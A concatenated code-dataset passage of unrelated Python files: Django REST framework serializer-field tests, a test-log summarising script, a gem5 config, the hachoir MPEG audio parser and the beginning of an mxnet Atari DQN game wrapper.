'medium',
('good', 'Good quality'),
]
)
class TestMultipleChoiceField(FieldValues):
"""
Valid and invalid values for `MultipleChoiceField`.
"""
valid_inputs = {
(): set(),
('aircon',): set(['aircon']),
('aircon', 'manual'): set(['aircon', 'manual']),
}
invalid_inputs = {
'abc': ['Expected a list of items but got type "str".'],
('aircon', 'incorrect'): ['"incorrect" is not a valid choice.']
}
outputs = [
(['aircon', 'manual', 'incorrect'], set(['aircon', 'manual', 'incorrect']))
]
field = serializers.MultipleChoiceField(
choices=[
('aircon', 'AirCon'),
('manual', 'Manual drive'),
('diesel', 'Diesel'),
]
)
def test_against_partial_and_full_updates(self):
field = serializers.MultipleChoiceField(choices=(('a', 'a'), ('b', 'b')))
field.partial = False
assert field.get_value(QueryDict({})) == []
field.partial = True
assert field.get_value(QueryDict({})) == rest_framework.fields.empty
class TestEmptyMultipleChoiceField(FieldValues):
"""
Invalid values for `MultipleChoiceField(allow_empty=False)`.
"""
valid_inputs = {
}
invalid_inputs = (
([], ['This selection may not be empty.']),
)
outputs = [
]
field = serializers.MultipleChoiceField(
choices=[
('consistency', 'Consistency'),
('availability', 'Availability'),
('partition', 'Partition tolerance'),
],
allow_empty=False
)
# File serializers...
class MockFile:
def __init__(self, name='', size=0, url=''):
self.name = name
self.size = size
self.url = url
def __eq__(self, other):
return (
isinstance(other, MockFile) and
self.name == other.name and
self.size == other.size and
self.url == other.url
)
class TestFileField(FieldValues):
"""
Values for `FileField`.
"""
valid_inputs = [
(MockFile(name='example', size=10), MockFile(name='example', size=10))
]
invalid_inputs = [
('invalid', ['The submitted data was not a file. Check the encoding type on the form.']),
(MockFile(name='example.txt', size=0), ['The submitted file is empty.']),
(MockFile(name='', size=10), ['No filename could be determined.']),
(MockFile(name='x' * 100, size=10), ['Ensure this filename has at most 10 characters (it has 100).'])
]
outputs = [
(MockFile(name='example.txt', url='/example.txt'), '/example.txt'),
('', None)
]
field = serializers.FileField(max_length=10)
class TestFileFieldWithName(FieldValues):
"""
Values for `FileField` with a filename output instead of URLs.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = [
(MockFile(name='example.txt', url='/example.txt'), 'example.txt')
]
field = serializers.FileField(use_url=False)
# Stub out mock Django `forms.ImageField` class so we don't *actually*
# call into its regular validation, or require PIL for testing.
class FailImageValidation(object):
def to_python(self, value):
raise serializers.ValidationError(self.error_messages['invalid_image'])
class PassImageValidation(object):
def to_python(self, value):
return value
class TestInvalidImageField(FieldValues):
"""
Values for an invalid `ImageField`.
"""
valid_inputs = {}
invalid_inputs = [
(MockFile(name='example.txt', size=10), ['Upload a valid image. The file you uploaded was either not an image or a corrupted image.'])
]
outputs = {}
field = serializers.ImageField(_DjangoImageField=FailImageValidation)
class TestValidImageField(FieldValues):
"""
    Values for a valid `ImageField`.
"""
valid_inputs = [
(MockFile(name='example.txt', size=10), MockFile(name='example.txt', size=10))
]
invalid_inputs = {}
outputs = {}
field = serializers.ImageField(_DjangoImageField=PassImageValidation)
# Composite serializers...
class TestListField(FieldValues):
"""
Values for `ListField` with IntegerField as child.
"""
valid_inputs = [
([1, 2, 3], [1, 2, 3]),
(['1', '2', '3'], [1, 2, 3]),
([], [])
]
invalid_inputs = [
('not a list', ['Expected a list of items but got type "str".']),
([1, 2, 'error'], ['A valid integer is required.']),
({'one': 'two'}, ['Expected a list of items but got type "dict".'])
]
outputs = [
([1, 2, 3], [1, 2, 3]),
(['1', '2', '3'], [1, 2, 3])
]
field = serializers.ListField(child=serializers.IntegerField())
def test_no_source_on_child(self):
with pytest.raises(AssertionError) as exc_info:
serializers.ListField(child=serializers.IntegerField(source='other'))
assert str(exc_info.value) == (
"The `source` argument is not meaningful when applied to a `child=` field. "
"Remove `source=` from the field declaration."
)
def test_collection_types_are_invalid_input(self):
field = serializers.ListField(child=serializers.CharField())
        input_value = {'one': 'two'}
with pytest.raises(serializers.ValidationError) as exc_info:
field.to_internal_value(input_value)
assert exc_info.value.detail == ['Expected a list of items but got type "dict".']
class TestEmptyListField(FieldValues):
"""
Values for `ListField` with allow_empty=False flag.
"""
valid_inputs = {}
invalid_inputs = [
([], ['This list may not be empty.'])
]
outputs = {}
field = serializers.ListField(child=serializers.IntegerField(), allow_empty=False)
class TestUnvalidatedListField(FieldValues):
"""
Values for `ListField` with no `child` argument.
"""
valid_inputs = [
([1, '2', True, [4, 5, 6]], [1, '2', True, [4, 5, 6]]),
]
invalid_inputs = [
('not a list', ['Expected a list of items but got type "str".']),
]
outputs = [
([1, '2', True, [4, 5, 6]], [1, '2', True, [4, 5, 6]]),
]
field = serializers.ListField()
class TestDictField(FieldValues):
"""
    Values for `DictField` with CharField as child.
"""
valid_inputs = [
({'a': 1, 'b': '2', 3: 3}, {'a': '1', 'b': '2', '3': '3'}),
]
invalid_inputs = [
({'a': 1, 'b': None}, ['This field may not be null.']),
('not a dict', ['Expected a dictionary of items but got type "str".']),
]
outputs = [
({'a': 1, 'b': '2', 3: 3}, {'a': '1', 'b': '2', '3': '3'}),
]
field = serializers.DictField(child=serializers.CharField())
def test_no_source_on_child(self):
with pytest.raises(AssertionError) as exc_info:
serializers.DictField(child=serializers.CharField(source='other'))
assert str(exc_info.value) == (
"The `source` argument is not meaningful when applied to a `child=` field. "
"Remove `source=` from the field declaration."
)
def test_allow_null(self):
"""
If `allow_null=True` then `None` is a valid input.
"""
field = serializers.DictField(allow_null=True)
output = field.run_validation(None)
assert output is None
class TestDictFieldWithNullChild(FieldValues):
"""
    Values for `DictField` with an allow_null CharField as child.
"""
valid_inputs = [
({'a': None, 'b': '2', 3: 3}, {'a': None, 'b': '2', '3': '3'}),
]
invalid_inputs = [
]
outputs = [
({'a': None, 'b': '2', 3: 3}, {'a': None, 'b': '2', '3': '3'}),
]
field = serializers.DictField(child=serializers.CharField(allow_null=True))
class TestUnvalidatedDictField(FieldValues):
"""
    Values for `DictField` with no `child` argument.
"""
valid_inputs = [
({'a': 1, 'b': [4, 5, 6], 1: 123}, {'a': 1, 'b': [4, 5, 6], '1': 123}),
]
invalid_inputs = [
('not a dict', ['Expected a dictionary of items but got type "str".']),
]
outputs = [
({'a': 1, 'b': [4, 5, 6]}, {'a': 1, 'b': [4, 5, 6]}),
]
field = serializers.DictField()
class TestJSONField(FieldValues):
"""
Values for `JSONField`.
"""
valid_inputs = [
({
'a': 1,
'b': ['some', 'list', True, 1.23],
'3': None
}, {
'a': 1,
'b': ['some', 'list', True, 1.23],
'3': None
}),
]
invalid_inputs = [
({'a': set()}, ['Value must be valid JSON.']),
]
outputs = [
({
'a': 1,
'b': ['some', 'list', True, 1.23],
'3': 3
}, {
'a': 1,
'b': ['some', 'list', True, 1.23],
'3': 3
}),
]
field = serializers.JSONField()
class TestBinaryJSONField(FieldValues):
"""
Values for `JSONField` with binary=True.
"""
valid_inputs = [
(b'{"a": 1, "3": null, "b": ["some", "list", true, 1.23]}', {
'a': 1,
'b': ['some', 'list', True, 1.23],
'3': None
}),
]
invalid_inputs = [
('{"a": "unterminated string}', ['Value must be valid JSON.']),
]
outputs = [
(['some', 'list', True, 1.23], b'["some", "list", true, 1.23]'),
]
field = serializers.JSONField(binary=True)
# Tests for FileField.
# ---------------------
class MockRequest:
def build_absolute_uri(self, value):
return 'http://example.com' + value
class TestFileFieldContext:
def test_fully_qualified_when_request_in_context(self):
field = serializers.FileField(max_length=10)
field._context = {'request': MockRequest()}
obj = MockFile(name='example.txt', url='/example.txt')
value = field.to_representation(obj)
assert value == 'http://example.com/example.txt'
# Tests for SerializerMethodField.
# --------------------------------
class TestSerializerMethodField:
def test_serializer_method_field(self):
class ExampleSerializer(serializers.Serializer):
example_field = serializers.SerializerMethodField()
def get_example_field(self, obj):
return 'ran get_example_field(%d)' % obj['example_field']
serializer = ExampleSerializer({'example_field': 123})
assert serializer.data == {
'example_field': 'ran get_example_field(123)'
}
def test_redundant_method_name(self):
class ExampleSerializer(serializers.Serializer):
example_field = serializers.SerializerMethodField('get_example_field')
with pytest.raises(AssertionError) as exc_info:
ExampleSerializer().fields
assert str(exc_info.value) == (
"It is redundant to specify `get_example_field` on "
"SerializerMethodField 'example_field' in serializer "
"'ExampleSerializer', because it is the same as the default "
"method name. Remove the `method_name` argument."
)
| bsd-2-clause | 7,313,714,012,877,029,000 | 30.397252 | 163 | 0.583818 | false |
CarlosMontilla/FxM | scripts/test/check_tests.py | 1 | 4412 | #!/usr/bin/env python3
"""!
@file
"""
import glob
import sys
import time
# @todo: manage tests that have to be checked manually (such as plots)
def analyse_log(filename):
"""!
@brief Analyse a test log to find passed and failed tests
@param filename Name of the log file
    @return Dictionary with the keys "name", "compiled", "ran", "pass" and "fail"
"""
passed_str = "Passed"
failed_str = "Failed"
name_str = "Test unit: "
compiled_str = "Compiled on: "
ran_str = "\t Local "
name = ""
compiled_date = ""
run_date = ""
pass_count = 0
fail_count = 0
log_file = open(filename, 'r')
for line in log_file:
if name_str in line:
name = line[len(name_str):-1]
elif compiled_str in line:
compiled_date = line[len(compiled_str):-1]
elif ran_str in line:
run_date = line[len(ran_str):-1]
elif passed_str in line:
pass_count += 1
elif failed_str in line:
fail_count += 1
if name == "":
name = filename
res = {}
res["name"] = name
res["compiled"] = compiled_date
res["ran"] = run_date
res["pass"] = pass_count
res["fail"] = fail_count
return res
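# A minimal sketch of a log file analyse_log() can parse (the exact
# layout is an assumption inferred from the markers matched above):
#
#   Test unit: example_unit
#   Compiled on: Jan 01 2020 12:00:00
#            Local time: Jan 01 2020 12:00:05   (matched by "\t Local ")
#   Passed: check_a
#   Failed: check_b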
def main(folder, extension, outfile):
"""!
@brief Main function, analyse all the file in a directory with a given
extension and print the results of the passed and failed tests
@param folder Folder to analyse
@param extension File extension to analyse
@param outfile File to save a more extensive description of the tests
@return nothing
"""
fid = open(outfile, 'w+')
print("Test check run on " + time.strftime("%B %d %Y at %H:%M:%S %Z"),
file=fid)
print("", file=fid)
print("|{:^5}|{:^45}|{:^10}|{:^10}|".format("Num", "Test name", "Passed",
"Failed"), file=fid)
print("|{:^5}|{:45}+{:10}+{:10}|".format("-"*5, "-"*45, "-"*10, "-"*10), file=fid)
print("|{:^5}|{:^45}|{:^10}|{:^10}|".format("Num", "Test name", "Passed",
"Failed"))
print("|{:^5}|{:45}+{:10}+{:10}|".format("-"*5, "-"*45, "-"*10, "-"*10))
total_pass = 0
total_fail = 0
idx = 0
failed_units = []
for filename in glob.iglob(folder + "/*/**/" + "*." + extension,
recursive=True):
idx += 1
res = analyse_log(filename)
total_pass += res["pass"]
total_fail += res["fail"]
print("|{:^5}|{:<45}|{:^10}|{:^10}|".format(idx, res["name"],
res["pass"], res["fail"]), file=fid)
print("|{:^5}|{:<45}|{:^10}|{:^10}|".format(idx, res["name"],
res["pass"], res["fail"]))
print("|{:5}-{:45}+{:10}+{:10}|".format("-"*5, "-"*45, "-"*10, "-"*10), file=fid)
print("|{:5} {:<45}|{:^10}|{:^10}|".format("", "Total", total_pass,
total_fail), file=fid)
print("|{:5}-{:45}+{:10}+{:10}|".format("-"*5, "-"*45, "-"*10, "-"*10))
print("|{:5} {:<45}|{:^10}|{:^10}|".format("", "Total", total_pass,
total_fail))
print("", file=fid)
print("", file=fid)
total_pass = 0
total_fail = 0
idx = 0
for filename in glob.iglob(folder + "/*/**/" + "*." + extension,
recursive=True):
idx += 1
res = analyse_log(filename)
total_pass += res["pass"]
total_fail += res["fail"]
print("Test N " + str(idx) + ": " + res["name"], file=fid)
print("\t Logfile: " + filename, file=fid)
print("\t Compiled on: ", res["compiled"], file=fid)
print("\t Ran on: ", res["ran"], file=fid)
print("\t Passed tests: " + str(res["pass"]), file=fid)
print("\t Failed tests: " + str(res["fail"]), file=fid)
print("", file=fid)
if res["fail"] > 0:
failed_units.append((idx, res["name"]))
print("", file=fid)
if (len(failed_units) > 0):
print("FAILED UNITS:", file=fid)
for unit in failed_units:
print("\t" + str(unit[0]) + ": " + unit[1], file=fid)
else:
print("ALL TEST PASSED SUCCESSFULLY", file=fid)
fid.close()
if __name__ == "__main__":
main(sys.argv[1], sys.argv[2], sys.argv[3])
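# Example invocation (paths are placeholders):
#
#   ./check_tests.py build/tests log test_report.txt
#
# This scans build/tests/*/**/*.log recursively, prints the pass/fail
# table to stdout and writes the detailed report to test_report.txt.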
| gpl-3.0 | 4,165,981,222,870,648,000 | 27.282051 | 88 | 0.477108 | false |
Weil0ng/gem5 | tests/configs/tsunami-minor.py | 13 | 2346 | # Copyright (c) 2012 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Andreas Sandberg
from m5.objects import *
from alpha_generic import *
root = LinuxAlphaFSSystemUniprocessor(mem_mode='timing',
mem_class=DDR3_1600_8x8,
cpu_class=MinorCPU).create_root()
| bsd-3-clause | 5,583,841,547,507,860,000 | 53.55814 | 72 | 0.770247 | false |
duramato/SickRage | lib/hachoir_parser/audio/mpeg_audio.py | 86 | 13752 | """
MPEG audio file parser.
Creation: 12 decembre 2005
Author: Victor Stinner
"""
from hachoir_parser import Parser
from hachoir_core.field import (FieldSet,
MissingField, ParserError, createOrphanField,
Bit, Bits, Enum,
PaddingBits, PaddingBytes,
RawBytes)
from hachoir_parser.audio.id3 import ID3v1, ID3v2
from hachoir_core.endian import BIG_ENDIAN
from hachoir_core.tools import humanFrequency, humanBitSize
from hachoir_core.bits import long2raw
from hachoir_core.error import HACHOIR_ERRORS
from hachoir_core.stream import InputStreamError
# Max MP3 filesize: 200 MB
MAX_FILESIZE = 200*1024*1024*8
class Frame(FieldSet):
VERSION_NAME = { 0: "2.5", 2: "2", 3: "1" }
MPEG_I = 3
MPEG_II = 2
MPEG_II_5 = 0
LAYER_NAME = { 1: "III", 2: "II", 3: "I" }
LAYER_I = 3
LAYER_II = 2
LAYER_III = 1
# Bit rates (bit_rate * 1000 = bits/sec)
# key 15 is always invalid
BIT_RATES = {
1: ( # MPEG1
( 0, 32, 64, 96, 128, 160, 192, 224, 256, 288, 320, 352, 384, 416, 448 ), # layer I
( 0, 32, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 256, 320, 384 ), # layer II
( 0, 32, 40, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 256, 320 ), # layer III
# - 1 2 3 4 5 6 7 8 9 10 11 12 13 14 -
),
2: ( # MPEG2 / MPEG2.5
( 0, 32, 48, 56, 64, 80, 96, 112, 128, 144, 160, 176, 192, 224, 256 ), # layer I
( 0, 8, 16, 24, 32, 40, 48, 56, 64, 80, 96, 112, 128, 144, 160 ), # layer II
( 0, 8, 16, 24, 32, 40, 48, 56, 64, 80, 96, 112, 128, 144, 160 ), # layer III
# - 1 2 3 4 5 6 7 8 9 10 11 12 13 14 -
)
}
SAMPLING_RATES = {
3: {0: 44100, 1: 48000, 2: 32000}, # MPEG1
2: {0: 22050, 1: 24000, 2: 16000}, # MPEG2
0: {0: 11025, 1: 12000, 2: 8000} # MPEG2.5
}
EMPHASIS_NAME = {0: "none", 1: "50/15 ms", 3: "CCIT J.17"}
CHANNEL_MODE_NAME = {
0: "Stereo",
1: "Joint stereo",
2: "Dual channel",
3: "Single channel"
}
# Channel mode => number of channels
NB_CHANNEL = {
0: 2,
1: 2,
2: 2,
3: 1,
}
def __init__(self, *args, **kw):
FieldSet.__init__(self, *args, **kw)
if not self._size:
frame_size = self.getFrameSize()
if not frame_size:
raise ParserError("MPEG audio: Invalid frame %s" % self.path)
self._size = min(frame_size * 8, self.parent.size - self.address)
def createFields(self):
# Header
yield PaddingBits(self, "sync", 11, "Synchronize bits (set to 1)", pattern=1)
yield Enum(Bits(self, "version", 2, "MPEG audio version"), self.VERSION_NAME)
yield Enum(Bits(self, "layer", 2, "MPEG audio layer"), self.LAYER_NAME)
yield Bit(self, "crc16", "No CRC16 protection?")
# Rates and padding
yield Bits(self, "bit_rate", 4, "Bit rate")
yield Bits(self, "sampling_rate", 2, "Sampling rate")
yield Bit(self, "use_padding", "Stream field use padding?")
yield Bit(self, "extension", "Extension")
# Channel mode, mode extension, copyright, ...
yield Enum(Bits(self, "channel_mode", 2, "Channel mode"), self.CHANNEL_MODE_NAME)
yield Bits(self, "mode_ext", 2, "Mode extension")
yield Bit(self, "copyright", "Is copyrighted?")
yield Bit(self, "original", "Is original?")
yield Enum(Bits(self, "emphasis", 2, "Emphasis"), self.EMPHASIS_NAME)
size = (self.size - self.current_size) / 8
if size:
yield RawBytes(self, "data", size)
def isValid(self):
return (self["layer"].value != 0
and self["sync"].value == 2047
and self["version"].value != 1
and self["sampling_rate"].value != 3
and self["bit_rate"].value not in (0, 15)
and self["emphasis"].value != 2)
def getSampleRate(self):
"""
Read sampling rate. Returns None on error.
"""
version = self["version"].value
rate = self["sampling_rate"].value
try:
return self.SAMPLING_RATES[version][rate]
except (KeyError, IndexError):
return None
def getBitRate(self):
"""
Read bit rate in bit/sec. Returns None on error.
"""
layer = 3 - self["layer"].value
bit_rate = self["bit_rate"].value
if bit_rate in (0, 15):
return None
if self["version"].value == 3:
dataset = self.BIT_RATES[1] # MPEG1
else:
dataset = self.BIT_RATES[2] # MPEG2 / MPEG2.5
try:
return dataset[layer][bit_rate] * 1000
except (KeyError, IndexError):
return None
def getFrameSize(self):
"""
Read frame size in bytes. Returns None on error.
"""
frame_size = self.getBitRate()
if not frame_size:
return None
sample_rate = self.getSampleRate()
if not sample_rate:
return None
padding = int(self["use_padding"].value)
if self["layer"].value == self.LAYER_III:
if self["version"].value == self.MPEG_I:
return (frame_size * 144) // sample_rate + padding
else:
return (frame_size * 72) // sample_rate + padding
elif self["layer"].value == self.LAYER_II:
            return (frame_size * 144) // sample_rate + padding
else: # self.LAYER_I:
            frame_size = (frame_size * 12) // sample_rate
return (frame_size + padding) * 4
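    # Worked example (illustrative): an MPEG1 Layer III frame at
    # 128 kbit/s and 44100 Hz gives (128000 * 144) // 44100 = 417 bytes,
    # or 418 bytes when the padding bit is set.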
def getNbChannel(self):
return self.NB_CHANNEL[ self["channel_mode"].value ]
def createDescription(self):
info = ["layer %s" % self["layer"].display]
bit_rate = self.getBitRate()
if bit_rate:
info.append("%s/sec" % humanBitSize(bit_rate))
sampling_rate = self.getSampleRate()
if sampling_rate:
info.append(humanFrequency(sampling_rate))
return "MPEG-%s %s" % (self["version"].display, ", ".join(info))
def findSynchronizeBits(parser, start, max_size):
"""
Find synchronisation bits (11 bits set to 1)
Returns None on error, or number of bytes before the synchronization.
"""
address0 = parser.absolute_address
end = start + max_size
size = 0
while start < end:
# Fast search: search 0xFF (first byte of sync frame field)
length = parser.stream.searchBytesLength("\xff", False, start, end)
if length is None:
return None
size += length
start += length * 8
# Strong validation of frame: create the frame
# and call method isValid()
try:
frame = createOrphanField(parser, start-address0, Frame, "frame")
valid = frame.isValid()
except HACHOIR_ERRORS:
valid = False
if valid:
return size
# Invalid frame: continue
start += 8
size += 1
return None
class Frames(FieldSet):
# Padding bytes allowed before a frame
MAX_PADDING = 256
def synchronize(self):
addr = self.absolute_address
start = addr + self.current_size
end = min(start + self.MAX_PADDING*8, addr + self.size)
padding = findSynchronizeBits(self, start, end)
if padding is None:
raise ParserError("MPEG audio: Unable to find synchronization bits")
if padding:
return PaddingBytes(self, "padding[]", padding, "Padding before synchronization")
else:
return None
def looksConstantBitRate(self, count=10):
"""
Guess if frames are constant bit rate. If it returns False, you can
be sure that frames are variable bit rate. Otherwise, it looks like
constant bit rate (on first count fields).
"""
check_keys = ("version", "layer", "bit_rate")
last_field = None
for index, field in enumerate(self.array("frame")):
if last_field:
for key in check_keys:
if field[key].value != last_field[key].value:
return False
last_field = field
if index == count:
break
return True
def createFields(self):
# Find synchronisation bytes
padding = self.synchronize()
if padding:
yield padding
while self.current_size < self.size:
yield Frame(self, "frame[]")
# padding = self.synchronize()
# if padding:
# yield padding
# Read raw bytes at the end (if any)
size = (self.size - self.current_size) / 8
if size:
yield RawBytes(self, "raw", size)
def createDescription(self):
if self.looksConstantBitRate():
text = "(looks like) Constant bit rate (CBR)"
else:
text = "Variable bit rate (VBR)"
return "Frames: %s" % text
def createMpegAudioMagic():
# ID3v1 magic
magics = [("TAG", 0)]
# ID3v2 magics
for ver_major in ID3v2.VALID_MAJOR_VERSIONS:
magic = "ID3%c\x00" % ver_major
magics.append( (magic,0) )
# MPEG frame magic
# TODO: Use longer magic: 32 bits instead of 16 bits
SYNC_BITS = 2047
for version in Frame.VERSION_NAME.iterkeys():
for layer in Frame.LAYER_NAME.iterkeys():
for crc16 in (0, 1):
magic = (SYNC_BITS << 5) | (version << 3) | (layer << 1) | crc16
magic = long2raw(magic, BIG_ENDIAN, 2)
magics.append( (magic, 0) )
return magics
class MpegAudioFile(Parser):
PARSER_TAGS = {
"id": "mpeg_audio",
"category": "audio",
"file_ext": ("mpa", "mp1", "mp2", "mp3"),
"mime": (u"audio/mpeg",),
"min_size": 4*8,
# "magic": createMpegAudioMagic(),
"description": "MPEG audio version 1, 2, 2.5",
"subfile": "skip",
}
endian = BIG_ENDIAN
def validate(self):
if self[0].name in ("id3v2", "id3v1"):
return True
if not self.stream.checked: # TODO: is it possible to handle piped input?
return False
# Validate first 5 frames
for index in xrange(5):
try:
frame = self["frames/frame[%u]" % index]
except MissingField:
# Require a least one valid frame
if (1 <= index) \
and self["frames"].done:
return True
return "Unable to get frame #%u" % index
except (InputStreamError, ParserError):
return "Unable to create frame #%u" % index
# Check first frame values
if not frame.isValid():
return "Frame #%u is invalid" % index
# Check that all frames are similar
if not index:
frame0 = frame
else:
if frame0["channel_mode"].value != frame["channel_mode"].value:
return "Frame #%u channel mode is different" % index
return True
def createFields(self):
# Read ID3v2 (if any)
if self.stream.readBytes(0, 3) == "ID3":
yield ID3v2(self, "id3v2")
if self._size is None: # TODO: is it possible to handle piped input?
raise NotImplementedError
# Check if file is ending with ID3v1 or not and compute frames size
frames_size = self.size - self.current_size
addr = self.size - 128*8
if 0 <= addr:
has_id3 = (self.stream.readBytes(addr, 3) == "TAG")
if has_id3:
frames_size -= 128*8
else:
has_id3 = False
# Read frames (if any)
if frames_size:
yield Frames(self, "frames", size=frames_size)
# Read ID3v1 (if any)
if has_id3:
yield ID3v1(self, "id3v1")
def createDescription(self):
if "frames" in self:
frame = self["frames/frame[0]"]
return "%s, %s" % (frame.description, frame["channel_mode"].display)
elif "id3v2" in self:
return self["id3v2"].description
elif "id3v1" in self:
return self["id3v1"].description
else:
return "MPEG audio"
def createContentSize(self):
# Get "frames" field
field = self[0]
if field.name != "frames":
try:
field = self[1]
except MissingField:
# File only contains ID3v1 or ID3v2
return field.size
# Error: second field are not the frames"?
if field.name != "frames":
return None
# Go to last frame
frames = field
frame = frames["frame[0]"]
address0 = field.absolute_address
size = address0 + frame.size
while True:
try:
# Parse one MPEG audio frame
frame = createOrphanField(frames, size - address0, Frame, "frame")
# Check frame 32 bits header
if not frame.isValid():
break
except HACHOIR_ERRORS:
break
if MAX_FILESIZE < (size + frame.size):
break
size += frame.size
# ID3v1 at the end?
try:
if self.stream.readBytes(size, 3) == "TAG":
size += ID3v1.static_size
except InputStreamError:
pass
return size
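# Minimal usage sketch (assumes hachoir is installed; the file name is a
# placeholder):
#
#   from hachoir_core.stream import FileInputStream
#   parser = MpegAudioFile(FileInputStream(u"sample.mp3"))
#   print parser["frames/frame[0]"].description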
| gpl-3.0 | -7,043,573,774,525,663,000 | 32.705882 | 99 | 0.534177 | false |
xcgoner/dist-mxnet | example/reinforcement-learning/dqn/atari_game.py | 25 | 7148 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
__author__ = 'sxjscience'
import mxnet as mx
import numpy
import cv2
import logging
import os
from utils import *
from replay_memory import ReplayMemory
from game import Game
from game import DEFAULT_MAX_EPISODE_STEP
logger = logging.getLogger(__name__)
_dirname = os.path.dirname(os.path.realpath(__file__))
_default_rom_path = os.path.join(_dirname, "roms", "breakout.bin")
def ale_load_from_rom(rom_path, display_screen):
rng = get_numpy_rng()
try:
from ale_python_interface import ALEInterface
except ImportError as e:
raise ImportError('Unable to import the python package of Arcade Learning Environment. ' \
'ALE may not have been installed correctly. Refer to ' \
                          '`https://github.com/mgbellemare/Arcade-Learning-Environment` for some ' \
'installation guidance')
ale = ALEInterface()
ale.setInt('random_seed', rng.randint(1000))
if display_screen:
import sys
if sys.platform == 'darwin':
import pygame
pygame.init()
ale.setBool('sound', False) # Sound doesn't work on OSX
ale.setBool('display_screen', True)
else:
ale.setBool('display_screen', False)
ale.setFloat('repeat_action_probability', 0)
ale.loadROM(rom_path)
return ale
class AtariGame(Game):
def __init__(self,
rom_path=_default_rom_path,
frame_skip=4, history_length=4,
resize_mode='scale', resized_rows=84, resized_cols=84, crop_offset=8,
display_screen=False, max_null_op=30,
replay_memory_size=1000000,
replay_start_size=100,
death_end_episode=True):
super(AtariGame, self).__init__()
self.rng = get_numpy_rng()
self.ale = ale_load_from_rom(rom_path=rom_path, display_screen=display_screen)
self.start_lives = self.ale.lives()
self.action_set = self.ale.getMinimalActionSet()
self.resize_mode = resize_mode
self.resized_rows = resized_rows
self.resized_cols = resized_cols
self.crop_offset = crop_offset
self.frame_skip = frame_skip
self.history_length = history_length
self.max_null_op = max_null_op
self.death_end_episode = death_end_episode
self.screen_buffer_length = 2
self.screen_buffer = numpy.empty((self.screen_buffer_length,
self.ale.getScreenDims()[1], self.ale.getScreenDims()[0]),
dtype='uint8')
self.replay_memory = ReplayMemory(state_dim=(resized_rows, resized_cols),
history_length=history_length,
memory_size=replay_memory_size,
replay_start_size=replay_start_size)
self.start()
def start(self):
self.ale.reset_game()
null_op_num = self.rng.randint(self.screen_buffer_length,
max(self.max_null_op + 1, self.screen_buffer_length + 1))
for i in range(null_op_num):
self.ale.act(0)
self.ale.getScreenGrayscale(self.screen_buffer[i % self.screen_buffer_length, :, :])
self.total_reward = 0
self.episode_reward = 0
self.episode_step = 0
self.max_episode_step = DEFAULT_MAX_EPISODE_STEP
self.start_lives = self.ale.lives()
def force_restart(self):
self.start()
self.replay_memory.clear()
def begin_episode(self, max_episode_step=DEFAULT_MAX_EPISODE_STEP):
"""
Begin an episode of a game instance. We can play the game for a maximum of
`max_episode_step` and after that, we are forced to restart
"""
if self.episode_step > self.max_episode_step or self.ale.game_over():
self.start()
else:
for i in range(self.screen_buffer_length):
self.ale.act(0)
self.ale.getScreenGrayscale(self.screen_buffer[i % self.screen_buffer_length, :, :])
self.max_episode_step = max_episode_step
self.start_lives = self.ale.lives()
self.episode_reward = 0
self.episode_step = 0
@property
def episode_terminate(self):
termination_flag = self.ale.game_over() or self.episode_step >= self.max_episode_step
if self.death_end_episode:
return (self.ale.lives() < self.start_lives) or termination_flag
else:
return termination_flag
@property
def state_enabled(self):
return self.replay_memory.size >= self.replay_memory.history_length
def get_observation(self):
image = self.screen_buffer.max(axis=0)
if 'crop' == self.resize_mode:
original_rows, original_cols = image.shape
new_resized_rows = int(round(
float(original_rows) * self.resized_cols / original_cols))
resized = cv2.resize(image, (self.resized_cols, new_resized_rows),
interpolation=cv2.INTER_LINEAR)
crop_y_cutoff = new_resized_rows - self.crop_offset - self.resized_rows
img = resized[crop_y_cutoff:
crop_y_cutoff + self.resized_rows, :]
return img
else:
return cv2.resize(image, (self.resized_cols, self.resized_rows),
interpolation=cv2.INTER_LINEAR)
def play(self, a):
assert not self.episode_terminate,\
"Warning, the episode seems to have terminated. " \
"We need to call either game.begin_episode(max_episode_step) to continue a new " \
"episode or game.start() to force restart."
self.episode_step += 1
reward = 0.0
action = self.action_set[a]
for i in range(self.frame_skip):
reward += self.ale.act(action)
